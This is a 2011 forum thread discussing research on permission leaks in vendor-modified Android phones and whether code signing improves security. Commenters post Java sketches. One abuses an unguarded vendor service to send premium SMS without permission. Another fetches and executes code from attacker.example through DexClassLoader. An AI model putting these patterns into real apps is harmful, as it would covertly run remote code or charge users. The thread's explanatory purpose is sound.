A leaking woodpecker
December 5, 2011 3:56 PM

Security researchers at North Carolina State University led by Xuxian Jiang (who had previously discovered 12 malicious Android applications sold through Google's Android Market) have uncovered holes in how the permissions-based security model is enforced on numerous Android devices. Called "leaks", these vulnerabilities allow new and existing malicious applications to eavesdrop on calls, track the user's location, install applications, send SMS messages, delete data from the device, and more. (via)
posted by Blazecock Pileon (30 comments total) 9 users marked this as a favorite
 
No worries. I'm sure the ultra fast OS updating by the telcos will have this solved in a matter of only a few years.
posted by Threeway Handshake at 4:00 PM on December 5, 2011 [11 favorites]


"The consumers will pay us for the rope with which we will hang them."
posted by hank at 4:12 PM on December 5, 2011 [3 favorites]


So in light of what I learned on the recent phone OS thread, given that the Apple app store is far more restrictive than the Android Market, does that translate into more security? The link talked about code signing, but I'd agree it doesn't seem like a guarantee. Do studies show this?
posted by midmarch snowman at 4:14 PM on December 5, 2011 [1 favorite]


Even if code-signing isn't a guarantee, what's Google gaining by not doing it at all? Is it expensive to implement? I'm curious if anyone outside of Google is defending Google on its response to the earlier report from Jiang's team (from the first link):

In most respects, Google leads the pack when it comes to policing the security of its users...Android is clearly an exception. The backdoor contained in the rogue applications discovered by Jiang adopted a technique that closely mimics the “rootstrap” proof-of-concept exploit released in June 2010 by researcher Jon Oberheide. The apps actively exploited a significant omission in the Android security model that Google has shown no signs of fixing.

“This is something that's unique to Android because it doesn't have any sort of code-signing guarantees like the iPhone has,” Oberheide told The Register on Friday. “On iPhones, when you publish an app to the app market, Apple signs whatever code is distributed with the application that says you can only execute this code. You can't easily pull down new code over the internet and execute it.”

The apps discovered by Jiang were under no such restrictions, making it easy for them to pull down new code at any time that greatly expanded their capabilities...

To be sure, code signing isn't a silver bullet that completely deters apps from downloading new code and executing it at run time. Apps running on Apple's iOS theoretically could do the same thing by sneaking what's known as an interpreter into a rogue app, or by adopting a tedious developer process known as ROP, or return oriented programming. Almost no security researcher would disagree, however, that code signing significantly raises the bar to such attacks.

Code signing also helps prevent or lessen the effects of entire classes of exploits, such as those that corrupt memory.

In an email, the Google spokesman responded: "Code signing, as discussed in various public forums, does not guarantee that a malicious application cannot run untrusted code. Regardless of the platform, it doesn't prevent an application from executing code from the Internet."

posted by mediareport at 4:27 PM on December 5, 2011


It's worth noting that all but one of these vulnerabilities were introduced by the phone vendors and are not present in the stock OS. (The one exception is a bug that lets an app uninstall the text-to-speech system's installer, which normally only happens once you download the TTS data files.)

I wish they had tested Cyanogen; at least that has a better chance of seeing these kinds of bugs fixed quickly.
posted by teraflop at 4:28 PM on December 5, 2011 [2 favorites]


So, to use an analogy, it's more like a security flaw in a pre-installed copy of Internet Explorer, and less like a security flaw in Windows itself?
posted by codacorolla at 4:34 PM on December 5, 2011


Even if code-signing isn't a guarantee, what's Google gaining by not doing it at all?

You can install Android apps without going through a software store at all. You don't need to apply for a developer key to write Android software. That's a pretty big thing actually, although some people don't recognize it.

You don't need to sign code to run software on a Windows, Mac or Linux machine either. Some may regard this as a flaw. I do not.

I'm not actually sure iOS is any better. It still leaves the default root and password the same on all systems, to my knowledge.
posted by JHarris at 4:37 PM on December 5, 2011 [3 favorites]


iOS has a monetary barrier to entry, and apps have to go through a review process, but there's no rigorous security check involved in getting an application onto the App Store. You can download malicious apps from the Apple App Store: a security researcher got one on there called Instastock. It was removed after the press release about his research came out. Google removes malicious apps as well.

This isn't so much about malicious downloaded apps as about a problem with the security model of Android. Android gives you a readout of permissions before an app is installed. This article says that readout is not always accurate, and that many of the pre-loaded apps in manufacturers' custom images have security flaws that could be exploited.

In other words, a downloaded malicious app could say that it doesn't access SMS, and covertly send SMS messages by exploiting these bugs.
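
To make that concrete, here's a rough sketch of what abusing a leak like that could look like. Everything on the vendor side is invented (the package and component names especially); the point is just that this app declares no SMS permission at all and asks a leaky pre-installed app to do the work for it.

// Hypothetical malicious app whose manifest requests NO permissions.
// It abuses an imaginary, unprotected component in a vendor messaging app
// that holds android.permission.SEND_SMS itself.
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;

public class LeakDemoActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // "com.vendor.messaging" and its relay service are made-up names for
        // the kind of exported, unguarded component the paper reports finding.
        Intent i = new Intent("com.vendor.messaging.SEND_SMS");
        i.setClassName("com.vendor.messaging", "com.vendor.messaging.SmsRelayService");
        i.putExtra("address", "premium-rate number");
        i.putExtra("body", "subscribe");

        // The vendor component sends the SMS on our behalf because it never
        // checks whether the caller was actually granted SEND_SMS.
        startService(i);
    }
}

Whether a given phone actually ships a component that leaky is exactly what the researchers' analysis went looking for.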

iOS has a different security model. All apps are allowed free access to the internet, but they can't send SMS or call numbers. I'm not sure about the other permissions, but I believe all non-Apple apps are treated the same. The article's analysis doesn't really apply to iOS.
posted by demiurge at 4:40 PM on December 5, 2011 [3 favorites]


given that the Apple app store is far more restrictive than the Android Market, does that translate into more security?

Recently, the security researcher Charlie Miller intentionally put up an app that "could potentially let any app download and run unsigned code" after notifying Apple of the bug a few weeks prior. After a few days in the App Store, word got out and he was suspended from iOS development for a year.
posted by june made him a gemini at 4:42 PM on December 5, 2011 [5 favorites]


codacorolla: Pretty much. Most of the flaws were in vendor-specific software, so it's more like a bug in the custom search toolbar for IE that came pre-installed when you bought the system.
posted by demiurge at 4:42 PM on December 5, 2011


I'm not actually sure iOS is any better. It still leaves the default root and password the same on all systems, to my knowledge.

Nothing important to the user is really protected by root anyways. This really isn't an issue at all.
posted by schwa at 5:05 PM on December 5, 2011


Yeah, the only "stock" vulnerability is the one that can let an app delete another app. Not good, and probably fixed or being fixed, but not a privacy/security vulnerability per se.

This is why I recommend the Nexus phones to everyone: minimal/no bloatware, equivalent to a "clean" install of Windows vs. a Dell install of Windows.

The reference implementations from Google (i.e., the Nexus One and Nexus S) are rather clean and free from capability leaks, with only a single minor explicit leak (marked as 32 in Table 3) due to an app com.svox.pico. This app defines a receiver, which can be tricked to remove another app, com.svox.langpack.installer, by any other third-party app.

posted by wildcrdj at 5:20 PM on December 5, 2011 [3 favorites]


(er, it is a security vulnerability, but it doesn't expose any user data or allow the app to modify data / permissions in the way some of the others do. Still would be annoying but there is less obvious "benefit" from exploiting this attack than one that exposed user data, for instance)
posted by wildcrdj at 5:22 PM on December 5, 2011


midmarch snowman: "So in light of what I learned on the recent phone OS thread, given that the Apple app store is far more restrictive than the Android Market, does that translate into more security? The link talked about code signing, but I'd agree it doesn't seem like a guarantee. Do studies show this?"

Given that there haven't been any iPhone viruses so far that haven't involved people jailbreaking (which is to say, enabling unsigned code to run on their iPhones), it would appear that the main alternative so far to the Walled Garden is a vacant lot full of weeds.
posted by DoctorFedora at 5:27 PM on December 5, 2011 [1 favorite]


(I should say, with the exception of proof-of-concept holes like Instastock, which are never used maliciously by their discoverers, at least so far)
posted by DoctorFedora at 5:29 PM on December 5, 2011


It still leaves the default root and password the same on all systems, to my knowledge.

By "it" you mean "certain Jailbreaks that install sshd."
posted by Threeway Handshake at 5:48 PM on December 5, 2011 [3 favorites]


"It's worth noting that all but one of these vulnerabilities were introduced by the phone vendors and are not present in the stock OS."

This appears to be correct. The paper doesn't do a particularly good job explaining the issue, IMO. From my understanding, what's happening is as follows:

On Android, apps can pass requests to other apps; e.g., an app can ask the Messages app to send an SMS. With the stock Android apps, the apps receiving these requests check that the sending app has authorization to make them. However, manufacturers replace many of these apps (Messages, Dialer, etc.) with modified versions, and those versions don't check that the requests come from authorized apps, which allows any app on the system, including user-installed apps, to make the requests successfully.
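
Here's roughly what the missing check looks like from the receiving side. This is only a sketch (the service and its wire format are invented, and a real implementation would use AIDL), but Context.enforceCallingPermission() is the real API a privileged component can use to refuse unauthorized callers, and the manifest android:permission attribute is the declarative way to have the system do the same check for you.

// Hypothetical privileged component bundled with the phone. It holds
// android.permission.SEND_SMS and sends texts when other apps ask it to.
import android.Manifest;
import android.app.Service;
import android.content.Intent;
import android.os.Binder;
import android.os.IBinder;
import android.os.Parcel;
import android.telephony.SmsManager;

public class SmsRelayService extends Service {

    private final IBinder binder = new Binder() {
        @Override
        protected boolean onTransact(int code, Parcel data, Parcel reply, int flags) {
            // This is the check the stock apps make and, per the paper, many
            // vendor rewrites omit: reject callers not granted SEND_SMS.
            SmsRelayService.this.enforceCallingPermission(
                    Manifest.permission.SEND_SMS, "caller lacks SEND_SMS");

            String address = data.readString();
            String body = data.readString();
            SmsManager.getDefault().sendTextMessage(address, null, body, null, null);
            return true;
        }
    };

    @Override
    public IBinder onBind(Intent intent) {
        return binder;
    }
}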

This is an enormous problem, and phone-specific security issues like this will persist as long as Google lets OEMs replace crucial system services with their own (HTC in particular seems to have a very laissez-faire attitude toward security).
posted by esoterica at 6:05 PM on December 5, 2011 [3 favorites]


Given that there haven't been any iPhone viruses so far that haven't involved people jailbreaking (which is to say, enabling unsigned code to run on their iPhones), it would appear that the main alternative so far to the Walled Garden is a vacant lot full of weeds.

I'd say your analogy is scaled wrong. The "vacant lot full of weeds" would properly speaking be Windows. Android has more of a problem with malware than iOS, but it's not that bad.

Generally speaking, the more use you can potentially get out of a system, the more vulnerable it is to hacks. Apple drew that line much further toward the low-functionality end than Google did. (The word "generally" here is my acknowledgement that a well-designed system may not find it necessary to make a tradeoff.)

On the default username and password thing: Cydia expressly informs users that, if they install SSH, they should change the username and password, but the defaults are still there even without it. (Which may not be a problem, admittedly. If it was, I'd expect we'd have heard of more iOS hacks.)
posted by JHarris at 6:15 PM on December 5, 2011


I learned recently that Apple, Google, etc. don't recompile applications from source, creating an incredible attack vector for malicious developers.
posted by jeffburdges at 6:17 PM on December 5, 2011


I'm glad Apple does not modify the signed binaries that developers submit, especially if the app is a security utility (e.g., SSH client). If the binary is malicious or otherwise faulty, blame rests with the developer alone. In a manner of speaking, the procedure that Apple set up ensures that the custom code in a third-party app is more or less sandboxed away from other hands, including Apple's, and that strong cryptography can verify the bits that one buys from the App Store.
posted by Blazecock Pileon at 6:25 PM on December 5, 2011 [1 favorite]


On Android, apps can pass requests to other apps; e.g., an app can ask the Messages app to send an SMS. With the stock Android apps, the apps receiving these requests check that the sending app has authorization to make them. However, manufacturers replace many of these apps (Messages, Dialer, etc.) with modified versions, and those versions don't check that the requests come from authorized apps, which allows any app on the system, including user-installed apps, to make the requests successfully.

Kind of. Except that it's the apps somebody has already installed that then install other apps, which can do as they please with the dialer and messaging programs. This is the whole signed code thing they're talking about. On a system that only runs signed code, an app can't download and run another app.
posted by Threeway Handshake at 6:53 PM on December 5, 2011


Threeway Handshake wrote: This is the whole signed code thing they're talking about. On a system that only runs signed code, an app can't download and run another app.

No. Code signing verifies that an application you downloaded came from an authorized source and has not been modified since it was signed. It does absolutely nothing to prevent a malicious program from downloading and executing any damn thing it likes. That's pretty much not possible without the store owner reviewing the source and compiling the application themselves.
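
On Android the point is easy to demonstrate: any installed app can pull down a new jar/dex file and load it, and nothing re-verifies a signature on what it loaded. A rough sketch (the URL and payload class are invented; DexClassLoader and reflection are real, unrestricted APIs):

// Hypothetical: an innocuous-looking app fetches new code after install and
// runs it. Nothing shown at install time ever mentioned this code existed.
// (Call from a background thread in a real app.)
import android.content.Context;
import dalvik.system.DexClassLoader;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.net.URL;

public class PayloadLoader {
    public static void fetchAndRun(Context ctx) throws Exception {
        // Download a jar containing classes.dex that no market review ever saw.
        File payload = new File(ctx.getFilesDir(), "update.jar");
        InputStream in = new URL("http://attacker.example/update.jar").openStream();
        FileOutputStream out = new FileOutputStream(payload);
        byte[] buf = new byte[8192];
        int n;
        while ((n = in.read(buf)) != -1) {
            out.write(buf, 0, n);
        }
        out.close();
        in.close();

        // Load the downloaded code and invoke an entry point by reflection.
        DexClassLoader loader = new DexClassLoader(
                payload.getAbsolutePath(),
                ctx.getDir("dex", Context.MODE_PRIVATE).getAbsolutePath(),
                null,
                ctx.getClassLoader());
        Class<?> payloadClass = loader.loadClass("com.example.Payload");
        Method run = payloadClass.getMethod("run", Context.class);
        run.invoke(null, ctx);
    }
}

The app's own APK signature checks out fine the whole time; signing tells you who shipped the shell, not what it pulls in later.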
posted by wierdo at 7:37 PM on December 5, 2011 [3 favorites]


I don't know if anyone has brought this up, but in case no one has:

You're all getting this wrong. The main (security) advantage conferred by code signing does not involve some higher Apple vetting process. It's not like they audit your code; if you're using a newfangled technique, there is absolutely no reason why a signed binary wouldn't be able to execute code it downloaded off the internet, or mess around with any available exploits.

No, the main advantage comes from the fact that these keys cost $99 a pop, plus the effort necessary to pass the minimum app store vetting. Apple can invalidate any keys used for nefarious binaries, and thus the capital requirements make the operation way riskier to participate in.

Whether or not this guarantees higher user satisfaction is a separate conversation, but this is a consequence of economics and not superior engineering; for a few weeks back when iOS 4 came out, you could jailbreak your phone by just visiting a website!
posted by pmv at 8:50 PM on December 5, 2011


So basically the $99 for a key to install code is like the $5 we pay to become members here?
posted by ZeusHumms at 11:55 PM on December 5, 2011 [2 favorites]


ZeusHumms: Not really. It's a yearly subscription and there's no way to load your software on iOS devices without paying it (or hacking the device). So it's a Development Kit + App Store access bundle.
posted by demiurge at 7:07 AM on December 6, 2011


It does absolutely nothing to prevent a malicious program from downloading and executing any damn thing it likes.

Except when the OS will not run things that are not signed. You wouldn't be able to pull down compiled executables and then run them.

Obviously, the counterexample given is that the signed application could have an embedded interpreter, and this application could pull down something to interpret. But this is not the same thing, and is not "any damn thing it likes."
posted by Threeway Handshake at 8:34 AM on December 6, 2011 [1 favorite]


Signing is not required for restricting the actions a program can take; operating systems have for years been able to restrict programs from accessing arbitrary files, memory, or hardware devices. On Android devices, the Unix idea of groups is used to implement the array of permissions that an application can have. An operating system bug or a buggy privileged program can let a malicious program perform actions it shouldn't be able to (the paper is about the latter class of problem: buggy privileged programs).

Signing does not guarantee on its own that a program can't execute arbitrary native code at runtime. For instance, if the language of the signed program is C/C++ and the execution environment is native code, then all you need to do is write an exploitable buffer overflow into your code and use it to smuggle in the desired native code (subject to whatever OS-level mitigations of exploitable buffer overflows exist; as far as I'm aware, these are all partial solutions with workarounds possible in the exploiting code). However, the operating system access restrictions would prevent this smuggled code from performing restricted operations just as well as they prevented the native, buggy code from performing those operations.
posted by jepler at 10:57 AM on December 6, 2011


There are no meaningful protections against intentional buffer overflows designed into an application written in a mid-level language like C, C++, or Objective-C, jepler. Your application simply detects a trigger like an unusual character, adds some known quantity to a stack buffer's pointer, and copies the data there instead, modifying the return address. You could even hide this inside the source code with some finesse.

In theory, Java has considerably more resistance to such attacks, especially with serious code review, but realistically, once you've compromised an object's data, any actions it might reasonably take could be taken against the user's will, e.g. spyware phoning home.
posted by jeffburdges at 3:17 PM on December 6, 2011


No, the main advantage comes from the fact that these keys cost $99 a pop, plus the effort necessary to pass the minimum app store vetting. Apple can invalidate any keys used for nefarious binaries, and thus the capital requirements make the operation way riskier to participate in.

Oh, bullshit. $99 is way too small an amount to have the kind of effect you are talking about. $99 is not an onerous capital requirement, it's not even quite enough to buy an hour of a typical iOS developer's time.
posted by ook at 4:16 PM on December 6, 2011


Oh, bullshit. $99 is way too small an amount to have the kind of effect you are talking about. $99 is not an onerous capital requirement

It is for ME.
posted by JHarris at 2:02 AM on December 7, 2011




This thread has been archived and is closed to new comments